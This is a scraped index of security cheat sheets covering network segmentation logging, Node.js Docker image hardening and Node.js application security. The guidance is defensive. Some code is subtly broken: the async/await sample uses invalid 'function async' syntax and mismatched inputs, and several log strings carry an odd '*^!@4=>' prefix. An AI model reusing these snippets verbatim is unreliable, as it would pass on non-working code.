The network security policy may define, for example, the basic permissions allowed for the software development system. Let's look at an example of what such a policy might look like:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#secure-logging","title":"Secure logging","text":"

It is important that in the event of a compromise of any information system, its logs are not subsequently modified by an attacker. To do this, you can do the following: copy the logs to a separate server, for example, using the syslog protocol, which does not allow an attacker to modify the logs, syslog only allows you to add new events to the logs. The network security policy for this activity looks like this: In this example, we are also talking about application logs that may contain security events, as well as potentially important events that may indicate an attack.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-monitoring-systems","title":"Permissions for monitoring systems","text":"

Suppose a company uses Zabbix as an IT monitoring system. In this case, the policy might look like this:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#useful-links","title":"Useful links","text":""},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html","title":"Node.js Docker Cheat Sheet","text":"

The following cheatsheet provides production-grade guidelines for building optimized and secure Node.js Docker. You\u2019ll find it helpful regardless of the Node.js application you aim to build. This article will be helpful for you if:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#1-use-explicit-and-deterministic-docker-base-image-tags","title":"1) Use explicit and deterministic Docker base image tags","text":"

It may seem to be an obvious choice to build your image based on the node Docker image, but what are you actually pulling in when you build the image? Docker images are always referenced by tags, and when you don\u2019t specify a tag the default, :latest tag is used.

So, in fact, by specifying the following in your Dockerfile, you always build the latest version of the Docker image that has been built by the Node.js Docker working group:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-node","title":"FROM node","text":"

The shortcomings of building based on the default node image are as follows:

  1. Docker image builds are inconsistent. Just like we\u2019re using lockfiles to get a deterministic npm install behavior every time we install npm packages, we\u2019d also like to get deterministic docker image builds. If we build the image from node\u2014which effectively means the node:latest tag\u2014then every build will pull a newly built Docker image of node. We don\u2019t want to introduce this sort of non-deterministic behavior.
  2. The node Docker image is based on a full-fledged operating system, full of libraries and tools that you may or may not need to run your Node.js web application. This has two downsides. Firstly a bigger image means a bigger download size which, besides increasing the storage requirement, means more time to download and re-build the image. Secondly, it means you\u2019re potentially introducing security vulnerabilities, that may exist in all of these libraries and tools, into the image.

In fact, the node Docker image is quite big and includes hundreds of security vulnerabilities of different types and severities. If you\u2019re using it, then by default your starting point is going to be a baseline of 642 security vulnerabilities, and hundreds of megabytes of image data that is downloaded on every pull and build.

The recommendations for building better Docker images are:

  1. Use small Docker images\u2014this will translate to a smaller software footprint on the Docker image reducing the potential vulnerability vectors, and a smaller size, which will speed up the image build process
  2. Use the Docker image digest, which is the static SHA256 hash of the image. This ensures that you are getting deterministic Docker image builds from the base image.

Based on this, let\u2019s ensure that we use the Long Term Support (LTS) version of Node.js, and the minimal alpine image type to have the smallest size and software footprint on the image:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-nodelts-alpine","title":"FROM node:lts-alpine","text":"

Nonetheless, this base image directive will still pull new builds of that tag. We can find the SHA256 hash for it in the Docker Hub for this Node.js tag, or by running the following command once we pulled this image locally, and locate the Digest field in the output:

$ docker pull node:lts-alpine\nlts-alpine: Pulling from library/node\n0a6724ff3fcd: Already exists\n9383f33fa9f3: Already exists\nb6ae88d676fe: Already exists\n565e01e00588: Already exists\nDigest: sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nStatus: Downloaded newer image for node:lts-alpine\ndocker.io/library/node:lts-alpine\n

Another way to find the SHA256 hash is by running the following command:

$ docker images --digests\nREPOSITORY                     TAG              DIGEST                                                                    IMAGE ID       CREATED             SIZE\nnode                           lts-alpine       sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a   51d926a5599d   2 weeks ago         116MB\n

Now we can update the Dockerfile for this Node.js Docker image as follows:

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

However, the Dockerfile above, only specifies the Node.js Docker image name without an image tag which creates ambiguity for which exact image tag is being used\u2014it\u2019s not readable, hard to maintain and doesn\u2019t create a good developer experience.

Let\u2019s fix it by updating the Dockerfile, providing the full base image tag for the Node.js version that corresponds to that SHA256 hash:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#2-install-only-production-dependencies-in-the-nodejs-docker-image","title":"2) Install only production dependencies in the Node.js Docker image","text":"

The following Dockerfile directive installs all dependencies in the container, including devDependencies, which aren\u2019t needed for a functional application to work. It adds an unneeded security risk from packages used as development dependencies, as well as inflating the image size unnecessarily.

RUN npm install

Enforce deterministic builds with npm ci. This prevents surprises in a continuous integration (CI) flow because it halts if any deviations from the lockfile are made.

In the case of building a Docker image for production we want to ensure that we only install production dependencies in a deterministic way, and this brings us to the following recommendation for the best practice for installing npm dependencies in a container image:

RUN npm ci --only=production

The updated Dockerfile contents in this stage are as follows:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#3-optimize-nodejs-tooling-for-production","title":"3) Optimize Node.js tooling for production","text":"

When you build your Node.js Docker image for production, you want to ensure that all frameworks and libraries are using the optimal settings for performance and security.

This brings us to add the following Dockerfile directive:

ENV NODE\\_ENV production

At first glance, this looks redundant, since we already specified only production dependencies in the npm install phase\u2014so why is this necessary?

Developers mostly associate the NODE_ENV=production environment variable setting with the installation of production-related dependencies, however, this setting also has other effects which we need to be aware of.

Some frameworks and libraries may only turn on the optimized configuration that is suited to production if that NODE_ENV environment variable is set to production. Putting aside our opinion on whether this is a good or bad practice for frameworks to take, it is important to know this.

As an example, the Express documentation outlines the importance of setting this environment variable for enabling performance and security related optimizations:

The performance impact of the NODE_ENV variable could be very significant.

Many of the other libraries that you are relying on may also expect this variable to be set, so we should set this in our Dockerfile.

The updated Dockerfile should now read as follows with the NODE_ENV environment variable setting baked in:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#4-dont-run-containers-as-root","title":"4) Don\u2019t run containers as root","text":"

The principle of least privilege is a long-time security control from the early days of Unix and we should always follow this when we\u2019re running our containerized Node.js web applications.

The threat assessment is pretty straight-forward\u2014if an attacker is able to compromise the web application in a way that allows for command injection or directory path traversal, then these will be invoked with the user who owns the application process. If that process happens to be root then they can do virtually everything within the container, including [attempting a container escape or privilege escalation. Why would we want to risk it? You\u2019re right, we don\u2019t.

Repeat after me: \u201cfriends don\u2019t let friends run containers as root!\u201d

The official node Docker image, as well as its variants like alpine, include a least-privileged user of the same name: node. However, it\u2019s not enough to just run the process as node. For example, the following might not be ideal for an application to function well:

USER node\nCMD \"npm\" \"start\"\n

The reason for that is the USER Dockerfile directive only ensures that the process is owned by the node user. What about all the files we copied earlier with the COPY instruction? They are owned by root. That\u2019s how Docker works by default.

The complete and proper way of dropping privileges is as follows, also showing our up to date Dockerfile practices up to this point:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . /usr/src/app\nRUN npm ci --only=production\nUSER node\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#5-properly-handle-events-to-safely-terminate-a-nodejs-docker-web-application","title":"5) Properly handle events to safely terminate a Node.js Docker web application","text":"

One of the most common mistakes I see with blogs and articles about containerizing Node.js applications when running in Docker containers is the way that they invoke the process. All of the following and their variants are bad patterns you should avoid:

Let\u2019s dig in! I\u2019ll walk you through the differences between them and why they\u2019re all patterns to avoid.

The following concerns are key in order to understanding the context for properly running and terminating Node.js Docker applications:

  1. An orchestration engine, such as Docker Swarm, Kubernetes, or even just Docker engine itself, needs a way to send signals to the process in the container. Mostly, these are signals to terminate an application, such as SIGTERM and SIGKILL.
  2. The process may run indirectly, and if that happens then it\u2019s not always guaranteed that it will receive these signals.
  3. The Linux kernel treats processes that run as process ID 1 (PID) differently than any other process ID.

Equipped with that knowledge, let\u2019s begin investigating the ways of invoking the process for a container, starting off with the example from the Dockerfile we\u2019re building:

CMD \"npm\" \"start\"

The caveat here is two fold. Firstly, we\u2019re indirectly running the node application by directly invoking the npm client. Who\u2019s to say that the npm CLI forwards all events to the node runtime? It actually doesn\u2019t, and we can easily test that.

Make sure that in your Node.js application you set an event handler for the SIGHUP signal which logs to the console every time you\u2019re sending an event. A simple code example should look as follows:

function handle(signal) {\n   console.log(`*^!@4=> Received event: ${signal}`)\n}\nprocess.on('SIGHUP', handle)\n

Then run the container, and once it\u2019s up specifically send it the SIGHUP signal using the docker CLI and the special --signal command-line flag:

$ docker kill --signal=SIGHUP elastic\\_archimedes

Nothing happened, right? That\u2019s because the npm client doesn\u2019t forward any signals to the node process that it spawned.

The other caveat has to do with the different ways in which way you can specify the CMD directive in the Dockerfile. There are two ways, and they are not the same:

  1. the shellform notation, in which the container spawns a shell interpreter that wraps the process. In such cases, the shell may not properly forward signals to your process.
  2. the execform notation, which directly spawns a process without wrapping it in a shell. It is specified using the JSON array notation, such as: CMD [\u201cnpm\u201d, \u201cstart\u201d]. Any signals sent to the container are directly sent to the process.

Based on that knowledge, we want to improve our Dockerfile process execution directive as follows:

CMD \\[\"node\", \"server.js\"\\]

We are now invoking the node process directly, ensuring that it receives all of the signals sent to it, without it being wrapped in a shell interpreter.

However, this introduces another pitfall.

When processes run as PID 1 they effectively take on some of the responsibilities of an init system, which is typically responsible for initializing an operating system and processes. The kernel treats PID 1 in a different way than it treats other process identifiers. This special treatment from the kernel means that the handling of a SIGTERM signal to a running process won\u2019t invoke a default fallback behavior of killing the process if the process doesn\u2019t already set a handler for it.

To quote the Node.js Docker working group recommendation on this:\u00a0 \u201cNode.js was not designed to run as PID 1 which leads to unexpected behaviour when running inside of Docker. For example, a Node.js process running as PID 1 will not respond to SIGINT (CTRL-C) and similar signals\u201d.

The way to go about it then is to use a tool that will act like an init process, in that it is invoked with PID 1, then spawns our Node.js application as another process whilst ensuring that all signals are proxied to that Node.js process. If possible, we\u2019d like a small as possible tooling footprint for doing so to not risk having security vulnerabilities added to our container image.

One such tool is dumb-init which is statically linked and has a small footprint. Here\u2019s how we\u2019ll set it up:

RUN apk add dumb-init\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

This brings us to the following up to date Dockerfile. You\u2019ll notice that we placed the dumb-init package install right after the image declaration, so we can take advantage of Docker\u2019s caching of layers:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\nRUN npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Good to know: docker kill and docker stop commands only send signals to the container process with PID 1. If you\u2019re running a shell script that runs your Node.js application, then take note that a shell instance\u2014such as /bin/sh, for example\u2014doesn\u2019t forward signals to child processes, which means your app will never get a SIGTERM.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#6-graceful-tear-down-for-your-nodejs-web-applications","title":"6) Graceful tear down for your Node.js web applications","text":"

If we\u2019re already discussing process signals that terminate applications, let\u2019s make sure we\u2019re shutting them down properly and gracefully without disrupting users.

When a Node.js application receives an interrupt signal, also known as SIGINT, or CTRL+C, it will cause an abrupt process kill, unless any event handlers were set of course to handle it in a different behavior. This means that connected clients to a web application will be immediately disconnected. Now, imagine hundreds of Node.js web containers orchestrated by Kubernetes, going up and down as needs arise to scale or manage errors. Not the greatest user experience.

You can easily simulate this problem. Here\u2019s a stock Fastify web application example, with an inherent delayed response of 60 seconds for an endpoint:

fastify.get('/delayed', async (request, reply) => {\n const SECONDS_DELAY = 60000\n await new Promise(resolve => {\n     setTimeout(() => resolve(), SECONDS_DELAY)\n })\n return { hello: 'delayed world' }\n})\n\nconst start = async () => {\n try {\n   await fastify.listen(PORT, HOST)\n   console.log(`*^!@4=> Process id: ${process.pid}`)\n } catch (err) {\n   fastify.log.error(err)\n   process.exit(1)\n }\n}\n\nstart()\n

Run this application and once it\u2019s running send a simple HTTP request to this endpoint:

$ time curl https://localhost:3000/delayed

Hit CTRL+C in the running Node.js console window and you\u2019ll see that the curl request exited abruptly. This simulates the same experience your users would receive when containers tear down.

To provide a better experience, we can do the following:

  1. Set an event handler for the various termination signals like SIGINT and SIGTERM.
  2. The handler waits for clean up operations like database connections, ongoing HTTP requests and others.
  3. The handler then terminates the Node.js process.

Specifically with Fastify, we can have our handler call on fastify.close() which returns a promise that we will await, and Fastify will also take care to respond to every new connection with the HTTP status code 503 to signal that the application is unavailable.

Let\u2019s add our event handler:

async function closeGracefully(signal) {\n   console.log(`*^!@4=> Received signal to terminate: ${signal}`)\n\n   await fastify.close()\n   // await db.close() if we have a db connection in this app\n   // await other things we should cleanup nicely\n   process.exit()\n}\nprocess.on('SIGINT', closeGracefully)\nprocess.on('SIGTERM', closeGracefully)\n

Admittedly, this is more of a generic web application concern than Dockerfile related, but is even more important in orchestrated environments.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#7-find-and-fix-security-vulnerabilities-in-your-nodejs-docker-image","title":"7) Find and fix security vulnerabilities in your Node.js docker image","text":"

See Docker Security Cheat Sheet - Use static analysis tools

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#8-use-multi-stage-builds","title":"8) Use multi-stage builds","text":"

Multi-stage builds are a great way to move from a simple, yet potentially erroneous Dockerfile, into separated steps of building a Docker image, so we can avoid leaking sensitive information. Not only that, but we can also use a bigger Docker base image to install our dependencies, compile any native npm packages if needed, and then copy all these artifacts into a small production base image, like our alpine example.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#prevent-sensitive-information-leak","title":"Prevent sensitive information leak","text":"

The use-case here to avoid sensitive information leakage is more common than you think.

If you\u2019re building Docker images for work, there\u2019s a high chance that you also maintain private npm packages. If that\u2019s the case, then you probably needed to find some way to make that secret NPM_TOKEN available to the npm install.

Here\u2019s an example for what I\u2019m talking about:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nENV NPM_TOKEN 1234\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\n#RUN npm ci --only=production\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Doing this, however, leaves the .npmrc file with the secret npm token inside the Docker image. You could attempt to improve it by deleting it afterwards, like this:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nRUN rm -rf .npmrc\n

However, now the .npmrc file is available in a different layer of the Docker image. If this Docker image is public, or someone is able to access it somehow, then your token is compromised. A better improvement would be as follows:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

The problem now is that the Dockerfile itself needs to be treated as a secret asset, because it contains the secret npm token inside it.

Luckily, Docker supports a way to pass arguments into the build process:

ARG NPM_TOKEN\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

And then we build it as follows:

$ docker build . -t nodejs-tutorial --build-arg NPM\\_TOKEN=1234

I know you were thinking that we\u2019re all done at this point but, sorry to disappoint \ud83d\ude42

That\u2019s how it is with security\u2014sometimes the obvious things are yet just another pitfall.

What\u2019s the problem now, you ponder? Build arguments passed like that to Docker are kept in the history log. Let\u2019s see with our own eyes. Run this command:

$ docker history nodejs-tutorial

which prints the following:

IMAGE          CREATED              CREATED BY                                      SIZE      COMMENT\nb4c2c78acaba   About a minute ago   CMD [\"dumb-init\" \"node\" \"server.js\"]            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   USER node                                       0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN |1 NPM_TOKEN=1234 /bin/sh -c echo \"//reg\u2026   5.71MB    buildkit.dockerfile.v0\n<missing>      About a minute ago   ARG NPM_TOKEN                                   0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   COPY . . # buildkit                             15.3kB    buildkit.dockerfile.v0\n<missing>      About a minute ago   WORKDIR /usr/src/app                            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   ENV NODE_ENV=production                         0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN /bin/sh -c apk add dumb-init # buildkit     1.65MB    buildkit.dockerfile.v0\n

Did you spot the secret npm token there? That\u2019s what I mean.

There\u2019s a great way to manage secrets for the container image, but this is the time to introduce multi-stage builds as a mitigation for this issue, as well as showing how we can build minimal images.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#introducing-multi-stage-builds-for-nodejs-docker-images","title":"Introducing multi-stage builds for Node.js Docker images","text":"

Just like that principle in software development of Separation of Concerns, we\u2019ll apply the same ideas in order to build our Node.js Docker images. We\u2019ll have one image that we use to build everything that we need for the Node.js application to run, which in a Node.js world, means installing npm packages, and compiling native npm modules if necessary. That will be our first stage.

The second Docker image, representing the second stage of the Docker build, will be the production Docker image. This second and last stage is the image that we actually optimize for and publish to a registry, if we have one. That first image that we\u2019ll refer to as the build image, gets discarded and is left as a dangling image in the Docker host that built it, until it gets cleaned.

Here is the update to our Dockerfile that represents our progress so far, but separated into two stages:

# --------------> The build image\nFROM node:latest AS build\nARG NPM_TOKEN\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production && \\\n   rm -f .npmrc\n\n# --------------> The production image\nFROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

As you can see, I chose a bigger image for the build stage because I might need tooling like gcc (the GNU Compiler Collection) to compile native npm packages, or for other needs.

In the second stage, there\u2019s a special notation for the COPY directive that copies the node_modules/ folder from the build Docker image into this new production base image.

Also, now, do you see that NPM_TOKEN passed as build argument to the build intermediary Docker image? It\u2019s not visible anymore in the docker history nodejs-tutorial command output because it doesn\u2019t exist in our production docker image.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#9-keeping-unnecessary-files-out-of-your-nodejs-docker-images","title":"9) Keeping unnecessary files out of your Node.js Docker images","text":"

You have a .gitignore file to avoid polluting the git repository with unnecessary files, and potentially sensitive files too, right? The same applies to Docker images.

Docker has a .dockerignore which will ensure it skips sending any glob pattern matches inside it to the Docker daemon. Here is a list of files to give you an idea of what you might be putting into your Docker image that we\u2019d ideally want to avoid:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n

As you can see, the node_modules/ is actually quite important to skip because if we hadn\u2019t ignored it, then the simplistic Dockerfile version that we started with would have caused the local node_modules/ folder to be copied over to the container as-is.

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

In fact, it\u2019s even more important to have a .dockerignore file when you are practicing multi-stage Docker builds. To refresh your memory on how the 2nd stage Docker build looks like:

# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

The importance of having a .dockerignore is that when we do a COPY . /usr/src/app from the 2nd Dockerfile stage, we\u2019re also copying over any local node_modules/ to the Docker image. That\u2019s a big no-no as we may be copying over modified source code inside node_modules/.

On top of that, since we\u2019re using the wildcard COPY . we may also be copying into the Docker image sensitive files that include credentials or local configuration.

The take-away here for a .dockerignore file is:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#10-mounting-secrets-into-the-docker-build-image","title":"10) Mounting secrets into the Docker build image","text":"

One thing to note about the .dockerignore file is that it is an all or nothing approach and can\u2019t be turned on or off per build stages in a Docker multi-stage build.

Why is it important? Ideally, we would want to use the .npmrc file in the build stage, as we may need it because it includes a secret npm token to access private npm packages. Perhaps it also needs a specific proxy or registry configuration to pull packages from.

This means that it makes sense to have the .npmrc file available to the build stage\u2014however, we don\u2019t need it at all in the second stage for the production image, nor do we want it there as it may include sensitive information, like the secret npm token.

One way to mitigate this .dockerignore caveat is to mount a local file system that will be available for the build stage, but there\u2019s a better way.

Docker supports a relatively new capability referred to as Docker secrets, and is a natural fit for the case we need with .npmrc. Here is how it works:

Let\u2019s see how all of it works together. First the updated .dockerignore file:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n.npmrc\n

Then, the complete Dockerfile, with the updated RUN directive to install npm packages while specifying the .npmrc mount point:

# --------------> The build image\nFROM node:latest AS build\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN --mount=type=secret,mode=0644,id=npmrc,target=/usr/src/app/.npmrc npm ci --only=production\n\n# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

And finally, the command that builds the Node.js Docker image:

docker build . -t nodejs-tutorial --secret id=npmrc,src=.npmrc\n

Note: Secrets are a new feature in Docker and if you\u2019re using an older version, you might need to enable it Buildkit as follows:

DOCKER_BUILDKIT=1 docker build . -t nodejs-tutorial --build-arg NPM_TOKEN=1234 --secret id=npmrc,src=.npmrc\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html","title":"NodeJS Security Cheat Sheet","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet lists actions developers can take to develop secure Node.js applications. Each item has a brief explanation and solution that is specific to the Node.js environment.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#context","title":"Context","text":"

Node.js applications are increasing in number and they are no different from other frameworks and programming languages. Node.js applications are prone to all kinds of web application vulnerabilities.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheat sheet aims to provide a list of best practices to follow during development of Node.js applications.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#recommendations","title":"Recommendations","text":"

There are several recommendations to enhance security of your Node.js applications. These are categorized as:

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#application-security","title":"Application Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-flat-promise-chains","title":"Use flat Promise chains","text":"

Asynchronous callback functions are one of the strongest features of Node.js. However, increasing layers of nesting within callback functions can become a problem. Any multistage process can become nested 10 or more levels deep. This problem is referred to as a \"Pyramid of Doom\" or \"Callback Hell\". In such code, the errors and results get lost within the callback. Promises are a good way to write asynchronous code without getting into nested pyramids. Promises provide top-down execution while being asynchronous by delivering errors and results to next .then function.

Another advantage of Promises is the way Promises handle errors. If an error occurs in a Promise class, it skips over the .then functions and invokes the first .catch function it finds. This way Promises provide a higher assurance of capturing and handling errors. As a principle, you can make all your asynchronous code (apart from emitters) return promises. It should be noted that Promise calls can also become a pyramid. In order to completely stay away from \"Callback Hell\", flat Promise chains should be used. If the module you are using does not support Promises, you can convert base object to a Promise by using Promise.promisifyAll() function.

The following code snippet is an example of \"Callback Hell\":

function func1(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func2(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func3(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func4(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\n\nfunc1(\"input1\", function(err, result1){\nif(err){\n// error operations\n}\nelse {\n//some operations\nfunc2(\"input2\", function(err, result2){\nif(err){\n//error operations\n}\nelse{\n//some operations\nfunc3(\"input3\", function(err, result3){\nif(err){\n//error operations\n}\nelse{\n// some operations\nfunc4(\"input 4\", function(err, result4){\nif(err){\n// error operations\n}\nelse {\n// some operations\n}\n});\n}\n});\n}\n});\n}\n});\n

The above code can be securely written as follows using a flat Promise chain:

function func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\nfunc1(\"input1\")\n.then(function (result){\nreturn func2(\"input2\");\n})\n.then(function (result){\nreturn func3(\"input3\");\n})\n.then(function (result){\nreturn func4(\"input4\");\n})\n.catch(function (error) {\n// error operations\n});\n

And using async/await:

function async func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction async func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction async func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction async func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\n(async() => {\ntry {\nlet res1 = await func1(\"input1\");\nlet res2 = await func2(\"input2\");\nlet res3 = await func3(\"input2\");\nlet res4 = await func4(\"input2\");\n} catch(err) {\n// error operations\n}\n})();\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-request-size-limits","title":"Set request size limits","text":"

Buffering and parsing of request bodies can be a resource intensive task. If there is no limit on the size of requests, attackers can send requests with large request bodies that can exhaust server memory and/or fill disk space. You can limit the request body size for all requests using raw-body.

const contentType = require('content-type')\nconst express = require('express')\nconst getRawBody = require('raw-body')\n\nconst app = express()\n\napp.use(function (req, res, next) {\nif (!['POST', 'PUT', 'DELETE'].includes(req.method)) {\nnext()\nreturn\n}\n\ngetRawBody(req, {\nlength: req.headers['content-length'],\nlimit: '1kb',\nencoding: contentType.parse(req).parameters.charset\n}, function (err, string) {\nif (err) return next(err)\nreq.text = string\nnext()\n})\n})\n

However, fixing a request size limit for all requests may not be the correct behavior, since some requests may have a large payload in the request body, such as when uploading a file. Also, input with a JSON type is more dangerous than a multipart input, since parsing JSON is a blocking operation. Therefore, you should set request size limits for different content types. You can accomplish this very easily with express middleware as follows:

app.use(express.urlencoded({ extended: true, limit: \"1kb\" }));\napp.use(express.json({ limit: \"1kb\" }));\n

It should be noted that attackers can change the Content-Type header of the request and bypass request size limits. Therefore, before processing the request, data contained in the request should be validated against the content type stated in the request headers. If content type validation for each request affects the performance severely, you can only validate specific content types or request larger than a predetermined size.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-block-the-event-loop","title":"Do not block the event loop","text":"

Node.js is very different from common application platforms that use threads. Node.js has a single-thread event-driven architecture. By means of this architecture, throughput becomes high and the programming model becomes simpler. Node.js is implemented around a non-blocking I/O event loop. With this event loop, there is no waiting on I/O or context switching. The event loop looks for events and dispatches them to handler functions. Because of this, when CPU intensive JavaScript operations are executed, the event loop waits for them to finish. This is why such operations are called \"blocking\". To overcome this problem, Node.js allows assigning callbacks to IO-blocked events. This way, the main application is not blocked and callbacks run asynchronously. Therefore, as a general principle, all blocking operations should be done asynchronously so that the event loop is not blocked.

Even if you perform blocking operations asynchronously, your application may still not serve as expected. This happens if there is a code outside the callback that relies on the code within the callback to run first. For example, consider the following code:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\n});\nfs.unlinkSync('/file.txt');\n

In the above example, unlinkSync function may run before the callback, which will delete the file before the desired actions on the file content is done. Such race conditions can also affect the security of your application. An example would be a scenario where authentication is performed in a callback and authenticated actions are run synchronously. In order to eliminate such race conditions, you can write all operations that rely on each other in a single non-blocking function. By doing so, you can guarantee that all operations are executed in the correct order. For example, above code example can be written in a non-blocking way as follows:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\nfs.unlink('/file.txt', (err) => {\nif (err) throw err;\n});\n});\n

In the above code, call to unlink the file and other file operations are within the same callback. This provides the correct order of operations.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-input-validation","title":"Perform input validation","text":"

